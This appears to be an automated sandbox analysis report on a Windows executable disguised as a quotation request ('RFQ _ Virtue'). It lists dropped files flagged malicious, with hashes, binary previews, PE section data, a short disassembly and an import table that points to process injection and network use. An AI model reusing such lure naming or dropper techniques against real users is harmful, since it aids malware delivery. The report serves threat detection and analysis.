                                                                              Preview:...4:38AJSLA..59.UNZJ3IP.4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359.UNZD,.^A.0...O..`.[\Jf%<5-A(=aWX]V.:s.$qA@Wf< z.|.p,[]V.LCYhAQ359FU7[C.t0&..S_.s3+.K...|5).P..}T^."..p!6.gP%=s:-.IPA4938A..LA.249..k.J3IPA493.ALRG@Z35oBUNZJ3IPA49&8ANCLAQC19FU.ZJ#IPA693>ANSLAQ339FUNZJ3I E4918ANSLAS3u.FU^ZJ#IPA4)38QNSLAQ3%9FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ3.M#-:ZJ3..E49#8AN.HAQ#59FUNZJ3IPA493.AN3LAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANS
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):288768
                                                                              Entropy (8bit):7.994271917855947
                                                                              Encrypted:true
                                                                              SSDEEP:6144:mntWSXlPqqOC/jw8jxCI0jIXLKNq2p7iwZbtdH6ItEZR2A:jS1PqqOC7w8jCjIXOY87iUvagYR5
                                                                              MD5:E718A5652D2AB4800966589D11B88460
                                                                              SHA1:10C93CAF35DD75589C1A703E0C41C23D93F0C4D8
                                                                              SHA-256:A3AC7B5CB62E86D7804C24A82CE97B7CBBFDA0E0A9B64C50845BCF3A14CDDD97
                                                                              SHA-512:2C164D375457E187968098AD5D61206E117B2EFC2E0655E6C79F5B7A2AD44C065E02AA18A1CC05D7B5F8945D9C22457F9078BDB90594F97133BA99F88B71105F
                                                                              Malicious:false
                                                                              Preview:...4:38AJSLA..59.UNZJ3IP.4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359.UNZD,.^A.0...O..`.[\Jf%<5-A(=aWX]V.:s.$qA@Wf< z.|.p,[]V.LCYhAQ359FU7[C.t0&..S_.s3+.K...|5).P..}T^."..p!6.gP%=s:-.IPA4938A..LA.249..k.J3IPA493.ALRG@Z35oBUNZJ3IPA49&8ANCLAQC19FU.ZJ#IPA693>ANSLAQ339FUNZJ3I E4918ANSLAS3u.FU^ZJ#IPA4)38QNSLAQ3%9FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ3.M#-:ZJ3..E49#8AN.HAQ#59FUNZJ3IPA493.AN3LAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANSLAQ359FUNZJ3IPA4938ANS
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12320
                                                                              Entropy (8bit):7.98625208351619
                                                                              Encrypted:false
                                                                              SSDEEP:384:veEsXsiRJQzHDP/+SNDImL2Dkp/EiartcW:GnXsEKzjX+cDIm6Dkp8j
                                                                              MD5:55ECCEBBF76C050380FB39DA4B034385
                                                                              SHA1:08A8D343F0C54D687EA42AF6E76157A32542B2D3
                                                                              SHA-256:AD4869AF752F3ACE1760F83184D1EFA57B97F88EA84895C7895C2AE72A663F92
                                                                              SHA-512:F0E1E8D920D48263B236793D85DEBBC43753F68286FD2600478C579B2FD021EFABEACD74974494FC2E22F89E01EA68A1327D634317E0F5D3EDC1E78851FEA9C2
                                                                              Malicious:false
                                                                              Preview:...4."..4;.....u..m.b.5.+.$.Z..G?....N..$...IK......_>.y7..8......J....q[.z...H.$.[...L...*. ...$..E......}....N@.i..;...^.....E"|.........7.U._..c...u_(\.Y.......M2...[...z.....D...0.n.{.qs..\N.{.I...l...>.O....C_?n.=*...|.}.>>....{..k`]./.G.o.Z(|..%......m6.u.e....P_NQ...Odg...R..Z.Z+a.....Na..CkRs..R.Rlp8....P5......m...y...5!..g\o3..x...R..._..H?/.p+."..q H.&M..........k.7..K.....).~.|.4.....4.W.>!j_.\I._:.A..uS7r..G..[..>...a.3..A...F...W...+.\m...Y.`.2....o......p*.-.6.gL.....^.....t..3.Z..<.A.|3.j.t,%1..s.......@.Z.A.xP.b...Y.....w....."S......`....w.sle.v.Q-..u.i.......T1p.{.Ox.N.X.p..B..+.L.!..M:vmX.R..D.4N.e......%7t...i..?...Pf.../...EB..+s..|... L.N>.u.|v.)0..1..5...../zO,.>....Y...[.p..N....c...Q..T....0N.x..a0.[....6...X{...Q.=.........<....`.8...+.!+...{.%.C.OF....:....z.J.W.[...+&.GE+.N.*W6...BL.Q..?G\.uc....A@.5.69w(.^..{5.{\.d...&H7._..,?"...8.8......jZ....K..R..~..9<h.xM.....Yf...y...#M...$.... .!..2..(...#.;.......
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1348608
                                                                              Entropy (8bit):7.251542914652518
                                                                              Encrypted:false
                                                                              SSDEEP:24576:QQW4qoNUgslKNX0Ip0MgHCpoMBOubVg9N9JMlDlfjRiVuVsWt5MJMs:QQW9BKNX0IPgiKMBOuJgFIDRRAubt5M
                                                                              MD5:1D7D22CFCA51F1A73A539A64CC53B616
                                                                              SHA1:ED42E65503FA7243C0EA7F6A7FA74F0CC9C6737B
                                                                              SHA-256:FE45D3DBCC2F1D042BB84519F159BF085379433ECCE19A6D562B08E104988488
                                                                              SHA-512:846FC1C10D91F312FDA6A3080322D495292E0B8B5A4A024590166000B1BAB3CCCA91A5CE17E27A026A30DAB211D19D711ED5C5BCB3244E82F6E0E89DFE8ABF70
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.....................................".... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1592832
                                                                              Entropy (8bit):4.174818790769991
                                                                              Encrypted:false
                                                                              SSDEEP:24576:k2G7AbHjkAVg9N9JMlDlfjRiVuVsWt5MJMs:k2G7AbHjrgFIDRRAubt5M
                                                                              MD5:92997EC0D2672677B7893749429C7111
                                                                              SHA1:CAB50489B60AEA61E2E5FFC00177E87A51EA4D34
                                                                              SHA-256:A47B8CD6128EF73B1D93E8D88860BCEE867DB381FE01C253ACEE9A77C3C25315
                                                                              SHA-512:94E797678E46EADF1AD6FFEFB19D52630591B9F9179296D1D3F62391D3DF9ABA0A2BD5562B9F331D91F94CA03B45575A680FEEFF7D3F823126315E58A9B4246B
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@....................................Cx.... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@...........................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1242624
                                                                              Entropy (8bit):7.28765654963366
                                                                              Encrypted:false
                                                                              SSDEEP:24576:+kdpSI+K3S/GWei+qNv2wG3YVg9N9JMlDlfjRiVuVsWt5MJMs:+6SIGGWei2wG3ogFIDRRAubt5M
                                                                              MD5:2F8DCF43C75A2511D20EB9E59E43AB07
                                                                              SHA1:4E3440A5EE7AFA493F3931D0C1370641DF0E2AFF
                                                                              SHA-256:A4626C24299F0C0FD86E5B13321F33494777398FF6043869B975EB14925934F1
                                                                              SHA-512:12A99984B460E8F8ABB67F9A4884BE718D6351E7DEC8A86CACAD6AFB6B0172B83571CD72C627B22888F7F18AD6FCD6AA531FA88DD63A3F7619431E18D2C57BFA
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P............ ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1594368
                                                                              Entropy (8bit):4.17567675365005
                                                                              Encrypted:false
                                                                              SSDEEP:12288:EEP3RFDV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMsU:/FpVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                              MD5:5DBFDD947810E81DAFCE72FA7C481167
                                                                              SHA1:5A17D822C73A65F08A2F2751B3E35DBBEE1158DC
                                                                              SHA-256:5E4B38C964F07E6D72B4AA56C4EB39DA7C04CDCC8BF149231E18835E1AEA495D
                                                                              SHA-512:9ED10EF1F18601AD8120F011E7800870348CD6DACCA4B9E9126D47C9290D095D80C5F45C953544D3C0A6E5FBAD4A52B96CD7BB931FDF3FA0CCCBD034F19D0599
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\AppVClient.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12320
                                                                              Entropy (8bit):7.987595520707335
                                                                              Encrypted:false
                                                                              SSDEEP:192:e4nBJR6vB/3UHEpBknaoqhiU9A5uvXjd2FrlgEBTFIN824l8TwmflFA:n6CHeBauh45uvX+e4+xflq
                                                                              MD5:FB21C64B2AEFCAF4E619655EC791D270
                                                                              SHA1:F21E2721B2EFF6C4B8155AC752FE9ACC870798D6
                                                                              SHA-256:9CBE841CFDFB5AD6C2B36263A10400431B3BAC898CCB35D8142F3BFC1A1B18BA
                                                                              SHA-512:82A366641DD3640F4AF1D6163D6D303607C653388EE316E2F52BE84B8D963BC9B99D796386C2184A0CBED318B51425A49A855EB07705A0035C2A100B07203323
                                                                              Malicious:false
                                                                              Preview:.q...W.....v.#b...l6u..Z.!.'p.....1.".P@....7W8.s+..+.\.\.....|...n...V..O.v....Jc.~..xR.9..-...9.....M.;....]O.G.uI..`.Ho....c.b...K..f..TE~.-}.+.}.[.!9..S^.:q.4....P.;....].^G....F.i.(.......Fw.Z.......#q......>......]..n.Ap.....'U.>.1..J.0...,.d;n."...c.0..~...h.XH...W..5.ms.PS......j.|........:.O..F..q.*q(.......U..<:z9....7'cr...U.h..H...<..... .......yD.&..g..J....b..]...A.,CdHv.".ff.....G.H.@.....XBBa.F<.Ha.(Y.4L.MF..4....K.t.jt..O..L..G)..P.....-....v..H.C.....(,l..Z....Gg].6$....2."\..v.Qkz"._.._B.i..K.qe.*s..j^...0...6'......|t........D~2...k.R.u..T."k:.Z...x.ylQ........7."q..P...8.qx.)~.g.....y.j..Z...K.~............*.'.qz5.#..0.P...h?.;.j*.o.6.of...5.5.....D...{.B.......)p..G.../.P0.Js.i..n..3.......m._$......W.`.....Y?R..K..h[.|......6.a.@].....st.o.m..R~.OX.^m..^...{ ....."..-j.....;....6........?.j.....KI...u...F.A..U.i....7.......V{.=.Y...0b.[.....{.U.z...Ifq.KvE)..[.%._.....xY.......4&..P"....M7w......M.m..#.......
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):7.522076483270038
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:RFQ _ Virtue 054451000085.exe
                                                                              File size:1'801'728 bytes
                                                                              MD5:dd6599c8b0d09a38d88ef2c1e1720a6c
                                                                              SHA1:d538a849b763558e1577817593d00691e382b81a
                                                                              SHA256:ed0b66043d5223c79f2206468bd12d369d933e0db2234508702ce7402579835f
                                                                              SHA512:b50df5fce041b17b52ea6e3992ca36d8e3658c95aca90425568655b7e1188c01d7151cee08d62addf77fe9a62ed046fa710be8c18c10b00d1ccd6f40ee6eb55a
                                                                              SSDEEP:49152:dW0c++OCvkGs9FaUM2jPxFHwMzFJYSgFIDRRAubt5M:8B3vkJ9a27xqMrOUf
                                                                              TLSH:9585E02273DDC371CB679173FF2AB7056EBB38610630B85B2F940D79A960162162D7A3
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                              Icon Hash:aaf3e3e3938382a0
                                                                              Entrypoint:0x427dcd
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x6752E481 [Fri Dec 6 11:48:17 2024 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                              Instruction
                                                                              call 00007FE520866C0Ah
                                                                              jmp 00007FE5208599D4h
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              push edi
                                                                              push esi
                                                                              mov esi, dword ptr [esp+10h]
                                                                              mov ecx, dword ptr [esp+14h]
                                                                              mov edi, dword ptr [esp+0Ch]
                                                                              mov eax, ecx
                                                                              mov edx, ecx
                                                                              add eax, esi
                                                                              cmp edi, esi
                                                                              jbe 00007FE520859B5Ah
                                                                              cmp edi, eax
                                                                              jc 00007FE520859EBEh
                                                                              bt dword ptr [004C31FCh], 01h
                                                                              jnc 00007FE520859B59h
                                                                              rep movsb
                                                                              jmp 00007FE520859E6Ch
                                                                              cmp ecx, 00000080h
                                                                              jc 00007FE520859D24h
                                                                              mov eax, edi
                                                                              xor eax, esi
                                                                              test eax, 0000000Fh
                                                                              jne 00007FE520859B60h
                                                                              bt dword ptr [004BE324h], 01h
                                                                              jc 00007FE52085A030h
                                                                              bt dword ptr [004C31FCh], 00000000h
                                                                              jnc 00007FE520859CFDh
                                                                              test edi, 00000003h
                                                                              jne 00007FE520859D0Eh
                                                                              test esi, 00000003h
                                                                              jne 00007FE520859CEDh
                                                                              bt edi, 02h
                                                                              jnc 00007FE520859B5Fh
                                                                              mov eax, dword ptr [esi]
                                                                              sub ecx, 04h
                                                                              lea esi, dword ptr [esi+04h]
                                                                              mov dword ptr [edi], eax
                                                                              lea edi, dword ptr [edi+04h]
                                                                              bt edi, 03h
                                                                              jnc 00007FE520859B63h
                                                                              movq xmm1, qword ptr [esi]
                                                                              sub ecx, 08h
                                                                              lea esi, dword ptr [esi+08h]
                                                                              movq qword ptr [edi], xmm1
                                                                              lea edi, dword ptr [edi+08h]
                                                                              test esi, 00000007h
                                                                              je 00007FE520859BB5h
                                                                              bt esi, 03h
                                                                              jnc 00007FE520859C08h
                                                                              Programming Language:
                                                                              • [ASM] VS2013 build 21005
                                                                              • [ C ] VS2013 build 21005
                                                                              • [C++] VS2013 build 21005
                                                                              • [ C ] VS2008 SP1 build 30729
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [ASM] VS2013 UPD4 build 31101
                                                                              • [RES] VS2013 build 21005
                                                                              • [LNK] VS2013 UPD4 build 31101
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x616ac.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x8dcc40x8de00fa73b15dfd2617ec81babd6c86443ff5False0.5728679102422908data6.676132368411128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0xc70000x616ac0x618001b341c6216e24eef35b5e07572bf8bd1False0.9323843149038461data7.90450734705553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x1290000x960000x95000b390cfb4df4950a7f61360b7cd685f40False0.97575470585151data7.938034859964451IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                              RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                              RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                              RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                              RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                              RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                              RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                              RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                              RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                              RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                              RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                              RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                              RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                              RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                              RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                              RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                              RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                              RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                              RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                              RT_RCDATA0xcf7b80x58973data1.0003334555084922
                                                                              RT_GROUP_ICON0x12812c0x76dataEnglishGreat Britain0.6610169491525424
                                                                              RT_GROUP_ICON0x1281a40x14dataEnglishGreat Britain1.25
                                                                              RT_GROUP_ICON0x1281b80x14dataEnglishGreat Britain1.15
                                                                              RT_GROUP_ICON0x1281cc0x14dataEnglishGreat Britain1.25
                                                                              RT_VERSION0x1281e00xdcdataEnglishGreat Britain0.6181818181818182
                                                                              RT_MANIFEST0x1282bc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                              DLLImport
                                                                              WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                              VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                              WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                              PSAPI.DLLGetProcessMemoryInfo
                                                                              IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                              USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                              UxTheme.dllIsThemeActive
                                                                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
